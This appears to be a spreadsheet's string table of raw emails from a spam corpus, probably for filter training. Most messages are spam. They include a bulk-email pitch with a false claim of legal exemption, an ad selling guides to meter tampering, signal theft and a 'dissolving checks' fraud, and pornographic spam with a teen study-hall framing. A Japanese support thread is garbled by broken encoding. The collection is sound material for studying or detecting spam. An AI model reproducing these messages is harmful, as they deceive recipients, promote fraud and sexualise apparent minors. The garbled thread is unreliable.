 &lt;a href="http://clickthru.online.com/Click?q=94-rOVNQaI7VuMAb3HJ5elUjfr5JQyR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=aa-gBae-hUc1C0VlLsnEUuZc5HbsRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free New Cars for the Taking!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;font face="arial" size="10"&gt;
 &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hE10CCzME0D40ER0Ac"&gt;Get a FREE CAR or SUV!&lt;br&gt;
 CLICK HERE!&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font size="6"&gt;
 There are hundreds of companies &lt;br&gt;giving away FREE CARS!
 &lt;br&gt;
 &lt;br&gt;
   &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hE10CCzME0D40ER0Ac"&gt; &lt;img src="http://www.bd12.com/allfreecars/graph.gif" border="0"&gt;&lt;/a&gt; 
   &lt;br&gt;
   &lt;br&gt;
 &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hE10CCzME0D40ER0Ac"&gt;Chevy Blazer&lt;br&gt;
 Dodge Durango&lt;br&gt;
 Ford Windstar&lt;br&gt;
 Honda Civic And More...!&lt;br&gt;
 CLICK HERE!&lt;/a&gt;&lt;B&gt;
 &lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;B&gt;
 &lt;font face=arial size=1&gt;
 &lt;/font&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;BR&gt;&lt;BR&gt;&lt;CENTER&gt;&lt;table border="1" cellpadding="3" cellspacing="0" width="550" bordercolor="#000000" body bgcolor="white"&gt;
 &lt;tr&gt;&lt;td width="551" height="5" align="center" valign="middle"&gt;&lt;table width="550" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;FONT FACE="Verdana, Modern, Arial" SIZE="2" color="gray"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages. This message has been sent to gibbs@midrange.com because you are a member of Consumer Today or you signed up with one of our marketing partners. To unsubscribe, simply click &lt;a href="http://unsub.ct.consumertoday.net/consumer_today/ct_site_unsub.html"&gt;&lt;font color="blue"&gt;&lt;u&gt;here&lt;/u&gt;&lt;/font&gt;&lt;/a&gt; (please allow 3-5 business days for your unsubscribe request to be processed). Questions or comments - send them to &lt;a href="mailto:customerservice@consumertoday.net"&gt;&lt;font color="blue"&gt;&lt;u&gt;customerservice@consumertoday.net&lt;/u&gt;&lt;/font&gt;&lt;/a&gt;.&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/center&gt;&lt;/body&gt;
 &lt;IMG SRC="http://ct2.consumertoday.net/cgi-bin14/flosensing?y=E10CCzME0D40BK"&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: All digital
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#all_digital
 Date: 2002-10-06T23:38:12-05:00
 _Slashdot_: Digital Camera Quality Passing Film?[1] We just hired a 
 photographer for our wedding yesterday, Light Touch Imagery[2]. They offer 
 competitive prices; they can design the type of albums we want (with some 
 amount of artistic touchup); they do bridal and engagement portraits as well as 
 full wedding day coverage; they shoot all digital; and they give us all the 
 digital negatives on CD&amp;#8212;that is, the raw pictures that come straight out 
 of their cameras. No other photographer we met with came close.
 [1] http://slashdot.org/article.pl?sid=02/10/04/1549200&amp;mode=nested&amp;tid=126&amp;threshold=3
 [2] http://www.lighttouchimagery.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Set &amp; Forget! Blast Your Ad Over 200 Million Leads &amp; Growing Each Month Spam Fre
</t>
  </si>
  <si>
    <t xml:space="preserve">(See Disclaimer below)
 Dear Internet Marketers,
 Explode YOUR Sales OVERNIGHT Guanranteed!!!! 
 Introducing YOU The Worlds Easiest, Most Powerful Blasting System!
 Absolutely Hands FREE! Set it up and Forget it for LIFE!
 Blast your sales in to a raging frenzy overnight!! Email your solo ad to over  
 6.5 million opt-in prospects and GROWING daily "100% hands FREE for LIFE!" 
 YOU have the ability to reach over 2 billion (2,000,000,000) opt-in targeted 
 prospects a year "100% AUTOMATICALLY!!" Just Imagine what that will do 
 to your cashflow?! The possibilities are unlimited! No more yahoo or topica these 
 are real membership bases waiting for your solo ad right NOW!! No more being 
 burned for spam, receiving flames, getting shutdown, people threatening your 
 livelihood this is just pure opt-in profits sent through our 100% automated server 
 via our auto cutting edge bots!!, put your promotional campaign in to full blown 
 automation with the worlds first Online blaster that adapts "set and forget" technology!! 
 Simply set and forget then watch your sales Explode by 3,100% OVERNIGHT!! 
 "guaranteed"!! GO NOW!! 
 PLUS WE WILL ALSO PROVIDE YOU WITH:
 An FFA, classified and 2 safelist scripts!!
 The ability to blast your ad to 2,100,000+ ezine subscribers!!
 Entry in to 3 members only safelists! 
 10,400+ free guaranteed visitors to your site!!
 Access to 2,300+ free web-based safelists! 
 A tool which guarantees you a never-ending stream of traffic!!
 Special spy tools that will enable you to spy on your competition!
 56,000+ exploding ebooks and reports!
 A submission service to over 400,000+ search engines!
 The greatest press release blaster on the internet!
 2 free lifetime ads in the members area!
 6,500+ of the most potent submission tools on the net! 
 A submission service to over 12,000,000+ Sites Daily!!
 The most hightech autoresponder ever invented!!
 35,000+ free banner impressions!!
 2 free multi URL tracking services that will track almost anything!!  
 Plus 9 Additional Free Bonuses! So what are YOU waiting for? 
 Send blank email NOW to peacebuponu2@yahoo.com.sg with a word
 "YES Send The Link NOW"  in the subject field.
 (((((((((((((((( DOUBLE THE SPEED OF YOUR PC ))))))))))))))))))))
                           The Insider PC Secrets
 Learn exactly how to get more speed and efficiency out 
 of your PC without spending a single cent on hardware!
 ((((((((((((((((( DOUBLE THE SPEED OF YOUR PC )))))))))))))))))))
 Get the cheapest Web Host in town for only $35 per year!
                            PLUS
 Get your FREE email software NOW!
 (((((((((((((((((((((((((((((((((((((((((((((((((((((((((( DISCLAIMER )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 You are receiving this message for one of the following reasons: 
 1) we are on the same opt-in list; 
 2) you posted your ad to one of my FFA pages; 
 3) you have responded to one of my ads; 
 4) you have sent an e-mail to one of my addresses 
 5) you visited one of my sites 
 By doing so, you have agreed to receive this message. Under Bill s. l6l8 TITLE III passed by 
 the 105th US Congress this letter Cannot be considered Spam as long as the sender includes 
 contact information &amp; a method of "removal". If you are receiving this email by mistake, please 
 accept our apologies. To be removed simply send blank email to  peacebuponu2@yahoo.com.sg 
 with a word "remove" in the subject field.  Many thanks for your kind consideration. 
 ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((( DISCLAIMER )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey look at this, I can't believe how cheap this is...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Educate yourself about everything you ever wanted to know !!! 
 1. Satellite TV/RCA Dish Descrambler
 Our unique, complete plans for building your own home satellite TV descrambler. For access to a clear reception of pay TV signals on your home satellite dish! It does not require any additional equipment! Complete PC board template &amp; instructions! This also includes a manual for accessing the RCA/DSS satellite dish to receive free pay channels. All the latest information for doing it right. 
 2. X-Ray Envelope Spray
 Have you ever wanted to read the contents of an envelope without opening it? Many government and other organizations use what is known as X-Ray Envelope Spray to do this! An envelope is sprayed with this secret chemical and it becomes translucent for a short period of time, which allows the contents to be read without opening. Private supply houses sell small cans of this aerosol spray for up to $50 a can! The spray is actually a commonly available item found in major grocery and discount stores. No modification of the spray is needed, as it is ready to use as X-Ray Envelope Spray and sells for about $1.99 in retail stores!
 3. How to Find Anyone and Obtain Unlisted Phone Numbers
 Tired of getting the wrong number? Stop looking! We can help! We'll show you how to get the unlisted phone number of anyone. No one can hide now! Simple. Skip tracers use these tricks. We also include everything you need to know about finding missing people or loved ones from the comfort of your home. Why pay money when you can do it yourself? 
 4. Radar Zapper 
 This simply technique converts existing radar detectors into a device that will jam police radar. This device sends false readings back to the police radar! Works on virtually all detectors and easy to use!
 5. Untraceable E-Mail 
 How to send totally anonymous and untraceable E-mail. We're not talking about those generic Yahoo! Accounts -- this is the real McCoy, anonymous email. Everything explained. Absolutely untraceable.
 6. Underground Guide to Utility Meters
 The illustrated guide to gas, water &amp; electric meters! We show you in detail methods many people use to stop, slow down, even reverse all three types! This underground manual is one of our most popular items! Complete illustrated techniques and easy to do. Shows how to defeat all major brands &amp; models of gas, water &amp; electric meters.
 7. Scan-Tron Genius
 Here at last!! This very controversial report describes in detail how any student can easily defeat Scan-Tron test readers to pass a test even though he does not know the answer! This simple method will fool the scan reader into thinking you answered correctly! No tools needed. Completely tested. You won't believe how simple this method is!
 8. Bad Credit Cleaning Manual
 Simple ways to restore your bad credit rating to A++. Don't pay a credit counselor good money to do what you can do yourself. Many methods presented here - some legal &amp; some "not so legal". Wipe your slate clean from your own home. Get a fresh start.
 9. Pass Drug Tests 
 Don't use of drugs! However, many innocent people are victims of drug testing. Some over the counter medicine can trigger false results &amp; cost you your job. Proven methods to beat drug tests. We show you how to build a simple device that can fool the best! Protect yourself &amp; your job, even if you don't use drugs.
 10.Cable TV Decoders
 How to get cable TV and turn your converter box into "full service" mode. This is the latest and best way to gain access. Also, how to build your own "snooper stopper" for pennies. Prevents cable companies from spying on you.
 11. Free Long Distance
 You can make long distance calls to other countries at no cost! The information in these reports explains everything you need to call other countries! Country codes, city codes, overseas sender codes! Call England, Germany, the UK, practically anywhere!
 12. Dissolving Checks
 We show you in detail the "insufficient funds" checks scam used by people to obtain goods &amp; cash without having any money in the account. Many people do not even use false ID's in pulling this scam off. Complete detailed instructions plus rare information on the famous "dissolving" checks. These checks "dissolve" after being chemically coated &amp; deposited in the bank leaving no trace of the writer or account number. Not for illegal purposes. See how others do it. 
 13. Outsmart Lie Detector Tests
 Hundreds of thousands of people in this country are wrongfully fired or not hired simply because they did not pass the lie detector test even though they've done nothing wrong! Read drugless methods to help pass whether you are lying or not! A valuable tool for any job seeker. Don't be harassed by your employer ever again. Tested and proven.
 14. Lock-picks &amp; Lock-picking.
  Why buy expensive lock-picks &amp; pay for rip-off mail order locksmith courses? We'll show you how to make your own professional lock-picks. Exact detailed drawings &amp; construction techniques! This is perhaps the easiest to understand course ever published on this hush-hush subject. You won't believe how easy it is to make these tools! We also show you how a basic lock works &amp; how they are picked. This publication is complete with detailed drawings &amp; illustrations.
 15. Guaranteed Unsecured Credit Cards up to $50,000 Regardless of Bad Credit.
 We can show you how and where you can obtain unsecured Gold and Platinum credit cards with credits limits up to $50,000 per card!  Regardless of your past credit history! You are guaranteed to receive at least 2 unsecured credit cards of up to $20,000 through our exclusive list. The secret to getting the credit you deserve is knowing how and where to look!
 * No credit checks! No employment check!
 * No credit turndowns! No credit, Bad credit! 
 * Some with as low as 0% APR for the life of the card!
 * Guaranteed approval! 
 ALL IN ONE!!! PREVIOUSLY SOLD FOR HUNDREDS!!! ORDER NOW!!!
 That's 15 products, all for just $19.95 [shipping &amp; handling included].
 We accept cash, personal checks, money orders and cashiers checks. You must include a 
 Primary and secondary E-mail address, as we will be emailing you all the reports as soon as your payment is received.
 Print the following form &amp; mail it to:
 Info 4 Edu Only
 1300 N. Cahuenga Blvd # 362
 Los Angeles, CA 90028
 Please Print Clearly
 Name: _________________________________________________
 Primary Email Address: ___________________________________
 Secondary Email Address: _________________________________
 Make your check payable to: Info 4 Edu Only
 DISCLAIMER: Please note that this information is being provided for educational purposes only. The information itself is legal, while the usage of such information may be illegal. We do not advocate unauthorized use or theft of any services. If in doubt, check your local laws and act accordingly. 
 NOTE: All of the publications are Copyright 2001 by Info 4 Edu Only. We aggressively protect our copyrights and will seek prosecution of any website, web-master, web hosting service or anyone else that is in violation of US &amp; International Copyright Laws. 
 To be opt out from our future mailing please email optmeoutnow@aol.com with the word remove in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: ActiveBuddy
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --------------080209060700030309080805
 Content-Type: text/plain; charset=US-ASCII; format=flowed
 Content-Transfer-Encoding: 7bit
 I actually thought of this kind of active chat at AOL (in 1996 I think), 
 bringing up ads based on what was being discussed and other features. 
 For a while, the VP of dev. (now still CTO I think) was really hot on 
 the idea and they discussed patenting it. Then they lost interest. 
 Probably a good thing.
 sdw
 Lorin Rivers wrote:
 &gt;On 10/2/02 12:00 PM, "Mr. FoRK" &lt;fork_list@hotmail.com&gt; wrote:
 &gt;  
 &gt;
 &gt;&gt;What about a situation where you don't directly ask/talk to the bot, but
 &gt;&gt;they listen in and advise/correct/interject/etc?
 &gt;&gt;example: two people discussing trips, etc. may trigger a weather bot to
 &gt;&gt;mention what the forecast says - without directly being asked.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;My guess is it's more insidious than that, it's going to be ActiveSpam.
 &gt;
 &gt;"Oh, you're going to Seattle? I can get you airline tickets for less"
 &gt;
 &gt;Yuck
 &gt;  
 &gt;
 --------------080209060700030309080805
 Content-Type: text/html; charset=US-ASCII
 Content-Transfer-Encoding: 7bit
 &lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
   &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 I actually thought of this kind of active chat at AOL (in 1996 I think),
 bringing up ads based on what was being discussed and other features. &amp;nbsp;For
 a while, the VP of dev. (now still CTO I think) was really hot on the idea
 and they discussed patenting it. &amp;nbsp;Then they lost interest. &amp;nbsp;Probably a good
 thing.&lt;br&gt;
 &lt;br&gt;
 sdw&lt;br&gt;
 &lt;br&gt;
 Lorin Rivers wrote:&lt;br&gt;
 &lt;blockquote type="cite"
  cite="midB9C28892.35FF2%25lrivers@realsoftware.com"&gt;
   &lt;pre wrap=""&gt;On 10/2/02 12:00 PM, "Mr. FoRK" &lt;a class="moz-txt-link-rfc2396E" href="mailto:fork_list@hotmail.com"&gt;&amp;lt;fork_list@hotmail.com&amp;gt;&lt;/a&gt; wrote:
   &lt;/pre&gt;
   &lt;blockquote type="cite"&gt;
     &lt;pre wrap=""&gt;What about a situation where you don't directly ask/talk to the bot, but
 they listen in and advise/correct/interject/etc?
 example: two people discussing trips, etc. may trigger a weather bot to
 mention what the forecast says - without directly being asked.
     &lt;/pre&gt;
   &lt;/blockquote&gt;
   &lt;pre wrap=""&gt;&lt;!----&gt;
 My guess is it's more insidious than that, it's going to be ActiveSpam.
 "Oh, you're going to Seattle? I can get you airline tickets for less"
 Yuck
   &lt;/pre&gt;
 &lt;/blockquote&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --------------080209060700030309080805--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I was so scared... my very first DP
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Teen&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#FF0000" alink="#FF0000" vlink="#FF0000"&gt;
 &lt;center&gt;
 &lt;table bgcolor="#FFFFFF"&gt;
 	&lt;tr&gt;
 		&lt;td valign="top"&gt;&lt;a href="http://6.betahost.net/ltg/?aid=735143&amp;cid=88&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;&lt;img src="http://6.betahost.net/crv/teen.jpg" width="292" height="450" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 		&lt;td valign="top" width="300"&gt;
 			&lt;table bgcolor="#FFFFFF"&gt;
 				&lt;tr&gt;
 					&lt;td align="center"&gt;&lt;font size="4" color="#FF0000" face="arial"&gt;&lt;b&gt;Legal Teen XXX Hardcore&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;font size="1" color="#FF0000" face="arial"&gt;4 FREE&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt; &lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;font size="2" color="#000000" face="arial"&gt;Boy was Gauge surprised when Joey's friend conveniently showed up as things were getting hot.  She always dreamed of sucking two cocks while she played with herself during study hall, but fantasy is different than reality.  I wonder if she ever gave a thought to where those dicks would end up after they were done with her mouth?&lt;p&gt;Find out for &lt;font size="2" color="#FF0000" face="arial"&gt;&lt;b&gt;100% FREE&lt;/b&gt;&lt;/font&gt; at Legal Teen Girls!!!  We just added Gauge's three way, you have to see it!!!  We have tons of other sweet young teens getting it in ways they never imagined possible, for &lt;font size="2" color="#FF0000" face="arial"&gt;&lt;b&gt;FREE&lt;/b&gt;&lt;/font&gt;!!!!&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt; &lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td align="center"&gt;&lt;font size="4" color="#FF0000" face="arial"&gt;&lt;b&gt;&lt;a href="http://6.betahost.net/ltg/?aid=735143&amp;cid=88&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;CLICK HERE FOR YOUR 100% FREE LIFETIME MEMBERSHIP!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt; &lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td align="center"&gt;&lt;font size="1" color="#999999" face="arial"&gt;Disclaimer:&lt;br&gt;We are strongly against sending unsolicited emails to those who do not wish to receive our special mailings. You have opted in to one or more of our affiliate sites requesting to be notified of any special offers we may run from time to time. We also have attained the services of an independent 3rd party to overlook list management and removal services.  This is NOT unsolicited email. If you do not wish to receive further mailings, please &lt;a href="http://6.betahost.net/index.php?cid=88&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;click here to be removed from the list&lt;/a&gt;. Please accept our apologies if you have been sent this email in error. We honor all removal requests.&lt;/font&gt; &lt;/p&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?iso-2022-jp?B?UmU6IBskQjswSSkyPTNYJSglcyU4JUslIiVqJXMlME1NJVcbKEI=?=
</t>
  </si>
  <si>
    <t xml:space="preserve">OTC/_x001b_$B0KElMM_x001b_(B
 _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM$N_x001b_(Blivelink_x001b_$B%m%0$+$i$O_x001b_(B
 _x001b_$B8=:_!"860x$,FCDj$G$-$J$$$?$a_x001b_(B
 _x001b_$B&gt;pJs$r@0M}$7!"4D6-LL$r4^$a!"LdBj$N@Z$jJ,$1$r9T$J$C$F$$$-$^$9!#_x001b_(B
 _x001b_$B$=$N$?$a$K_x001b_(B[Service for UNIX]_x001b_$B$K4X$7$FLdBj$,$J$+$C$?$N$+_x001b_(B
 _x001b_$B3NG'$5$;$F$$$?$@$-$^$7$?!#_x001b_(B
 _x001b_$B%W%m%;%9%@%&amp;%s$NMW0x$H$7$F!"$5$^$6$^$J%1!&lt;%9$,$"$j$^$9$,_x001b_(B
 _x001b_$B4F::5!G=%m!&lt;%IIT6q9g!"_x001b_(BCA_x001b_$B$NIT6q9g0J30$K_x001b_(B
 _x001b_$B860x$N@Z$jJ,$1$N$?$a!"%W%m%;%9%@%&amp;%s$N860x$H$J$C$?FbMF$r_x001b_(B
 _x001b_$BJs9p$7$F$$$?$@$1$J$$$G$7$g$&amp;$+!#_x001b_(B
 _x001b_$B$J$*!"_x001b_(B[Service for UNIX]_x001b_$B$NLdBj$H$7$F!"_x001b_(BLivelink_x001b_$B$N;HMQ$9$k4D6-$H$O_x001b_(B
 _x001b_$BD&gt;@\4X78$J$$$+$b$7$l$^$;$s$,$*CN$i$;$7$^$9!#_x001b_(B
 http://www.microsoft.com/japan/support/kb/articles/JP294/3/80.htm
 http://www.microsoft.com/JAPAN/support/kb/articles/JP283/0/13.HTM?LN=JA&amp;SD=S
 O&amp;FR=0
 _x001b_$B%W%m%;%9%@%&amp;%s$,0l9o$bAa$/2r7h$G$-$k$h$&amp;_x001b_(B
 _x001b_$B$46(NO$*4j$$$$$?$7$^$9!#_x001b_(B
 _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 _x001b_$B0KF#!!@55A_x001b_(B
 -------- Original Message --------
 Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B  - ticket
 #55606OTC1 -
 Date: Tue, 30 Oct 2001 13:44:43 -0500
 From: "Hitoshi Ito" &lt;&gt;
 Reply-To: &lt;&gt;
 To: "'it-oh'" &lt;&gt;
 CC: &lt;&gt;, &lt;&gt;,&lt;&gt;, &lt;&gt;
 &gt;
 &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; _x001b_$B0KF#MM_x001b_(B
 &gt;
 &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt;
 &gt; [Service for UNIX] _x001b_$B$N$4&lt;ALd$H$7$F!"?7$7$$%A%1%C%HHV9f$G&lt;h$j07$o$;$F_x001b_(B
 &gt; _x001b_$B$$$?$@$-$^$9!#%5%]!&lt;%H$N%^%M!&lt;%8%c$K3NG'$r&lt;h$j$^$7$?$,!"8=:_$^$G$K_x001b_(B
 &gt; [Service for UNIX]_x001b_$B$r;HMQ$5$l$F$$$k$H$$$&amp;Nc$OJ9$$$?$3$H$,$"$j$^$;$s!#_x001b_(B
 &gt; _x001b_$BLdBj$J$/F0:n$9$k$+$I$&amp;$+$O5?Ld$,$"$k$=$&amp;$G$9!#%5%]!&lt;%H$5$l$F$$$J$$_x001b_(B
 &gt; _x001b_$B4D6-$G$9$7!"&lt;B:]MxMQ$7$F$$$k$H$$$&amp;$*5RMM$b!"_x001b_(B0_x001b_$B$@$H$$$&amp;$3$H$G$9!#_x001b_(B
 &gt; _x001b_$B!J&gt;/$J$/$H$b%5%]!&lt;%H$N$[$&amp;$KJs9p$5$l$F$$$kCf$G$O!"$G$9$,!&amp;!&amp;!&amp;!K_x001b_(B
 &gt;
 &gt; _x001b_$B2?$+!"_x001b_(B[Service for UNIX]_x001b_$B$,860x$G$O!"$H9M$($i$l$k$3$H$G$b$"$C$?$N$G_x001b_(B
 &gt; _x001b_$B$7$g$&amp;$+!)$b$7!";0I)2=3XMM$G!"%5%]!&lt;%H$5$l$F$$$kHO0O$G%W%m%;%9%@%&amp;%s_x001b_(B
 &gt; _x001b_$B$,5/$3$k$+%F%9%H$r9T$($k$h$&amp;$G$7$?$i!"3NG'$7$F$_$F$$$?$@$1$^$9$G$7$g$&amp;_x001b_(B
 &gt; _x001b_$B$+!)$G$-$k$@$1GS=|$G$-$kMW0x$O@Z$jN%$7$F$$$?$@$-$?$/;W$$$^$9!#_x001b_(B
 &gt; _x001b_$B!J$=$N@a$O!":#$^$G$N%W%m%;%9%@%&amp;%s$N%A%1%C%H!"_x001b_(B53121OTC1_x001b_$B$N$[$&amp;$G_x001b_(B
 &gt; _x001b_$BBP1~$$$?$7$^$9!#!K_x001b_(B
 &gt;
 &gt; _x001b_$B$h$m$7$/$*4j$$CW$7$^$9!#_x001b_(B
 &gt;
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: it-oh [mailto:]
 &gt; &gt; Sent: Tuesday, October 30, 2001 5:16 AM
 &gt; &gt; To:
 &gt; &gt; Cc: ; ;
 &gt; &gt; ;
 &gt; &gt; Subject: Re: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B - ticket
 &gt; &gt; #53121OTC1 -
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; OTC/_x001b_$B0KElMM_x001b_(B
 &gt; &gt; _x001b_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt;
 &gt; &gt; _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM$N4D6-$r3NG'$7$?$H$3$m_x001b_(B
 &gt; &gt; NT_x001b_$B&gt;e$K_x001b_(BLL8141_x001b_$B%5!&lt;%P$H_x001b_(BIndex_x001b_$B%G!&lt;%?$,$"$j$^$9$,_x001b_(B
 &gt; &gt; _x001b_$B30It%I%-%e%a%s%H$O!"_x001b_(B[Service for UNIX2.0]_x001b_$B$r;HMQ$7_x001b_(B
 &gt; &gt; Solaris2.6_x001b_$B$N_x001b_(BFileSystem_x001b_$B&gt;e$KB8:_$7$F$$$^$9!#_x001b_(B
 &gt; &gt; _x001b_$B$J$*!"_x001b_(BOracle_x001b_$B%(%s%8%s!"_x001b_(BTableSpace_x001b_$B$O!"_x001b_(BSolaris_x001b_$B&gt;e$K$"$j$^$9!#_x001b_(B
 &gt; &gt;
 &gt; &gt; _x001b_$B2a5n$K_x001b_(B[Service for UNIX]_x001b_$B$,860x$G%W%m%;%9%@%&amp;%s$K$J$C$?$3$H$O_x001b_(B
 &gt; &gt; _x001b_$B$"$j$^$9$+!#$^$?!"_x001b_(B[Service for UNIX]_x001b_$B$r;HMQ$7$F$$$k%f!&lt;%6$O!"$I$N$0$i$$_x001b_(B
 &gt; &gt; _x001b_$B$$$k$N$+GD0.$5$l$F$$$^$7$?$i$*CN$i$;$/$@$5$$!#_x001b_(B
 &gt; &gt;
 &gt; &gt; _x001b_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001b_(B
 &gt; &gt;
 &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; _x001b_$B0KF#!!@55A_x001b_(B
 &gt; &gt;
 &gt; &gt; -------- Original Message --------
 &gt; &gt; Subject: RE: _x001b_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001b_(B
 &gt; &gt;  - ticket #53121OTC1 -
 &gt; &gt; Date: Thu, 18 Oct 2001 17:24:33 -0400
 &gt; &gt; From: "Hitoshi Ito" &lt;&gt;
 &gt; &gt; Reply-To: &lt;&gt;
 &gt; &gt; To: "'it-oh'" &lt;&gt;
 &gt; &gt; CC: &lt;&gt;,
 &gt; &gt; &lt;&gt;,&lt;
 &gt; &gt; &gt;, &lt;&gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt; _x001b_$B%-%d%N%sHNGd!J3t!K_x001b_(B
 &gt; &gt; &gt; _x001b_$B0KF#MM_x001b_(B
 &gt; &gt; &gt;
 &gt; &gt; &gt; OpenText_x001b_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001b_(B
 &gt; &gt; &gt;
 &gt; &gt; &gt; _x001b_$B%7%+%4$+$i$NJV;v$G$O!"$*Aw$j$$$?$@$$$?_x001b_(Bwatch.log_x001b_$B$+$i$O%a%b%j$,860x$N$h_x001b_(B
 &gt; &gt; _x001b_$B$&amp;$G$O_x001b_(B
 &gt; &gt; &gt; _x001b_$B$J$$!"$H$N$3$H$G$7$?!#$7$+$7!"860x$O$o$+$i$J$$$=$&amp;$G$9!#@?$K?=$7Lu$J_x001b_(B
 &gt; &gt; _x001b_$B$$$N$G$9_x001b_(B
 &gt; &gt; &gt; _x001b_$B$,!"0z$-B3$-_x001b_(BLivelink_x001b_$B%m%0!"_x001b_(BDr. Watson_x001b_$B%m%0$J$I$N&lt;hF@$r$*4j$$CW$7$^$9!#_x001b_(B
 &gt; &gt; &gt;
 &gt; &gt; &gt; _x001b_$B@?$K?=$7Lu$J$$$N$G$9$,!"$3$l$,;d%5%]!&lt;%H$N$[$&amp;$G&lt;u$1$?3+H/$+$i$NJV;v_x001b_(B
 &gt; &gt; _x001b_$B$G$9!#$3_x001b_(B
 &gt; &gt; &gt; _x001b_$B$N7o$K4X$7$F!"&gt;.NS$,%7%+%4$N3+H/$N$[$&amp;$KD&gt;@\O"Mm$r&lt;h$C$F%U%)%m!&lt;$r$7_x001b_(B
 &gt; &gt; _x001b_$B$F$*$j$^_x001b_(B
 &gt; &gt; &gt; _x001b_$B$9!#$$$D$bF1$8$h$&amp;$J;j$i$J$$BP1~$K$J$C$F$7$^$$!"@?$K?=$7Lu$"$j$^$;$s_x001b_(B
 &gt; &gt; _x001b_$B!#_x001b_(B
 &gt; &gt; &gt;
 &gt; &gt; &gt; &gt; -----Original Message-----
 &gt; &gt; &gt; &gt; From: it-oh [mailto:]
 &gt; &gt; &gt; &gt; Sent: Thursday, October 18, 2001 5:49 AM
 &gt; &gt; &gt; &gt; To:
 &gt; &gt; &gt; &gt; Cc: ; ;
 &gt; &gt; &gt; &gt; ;
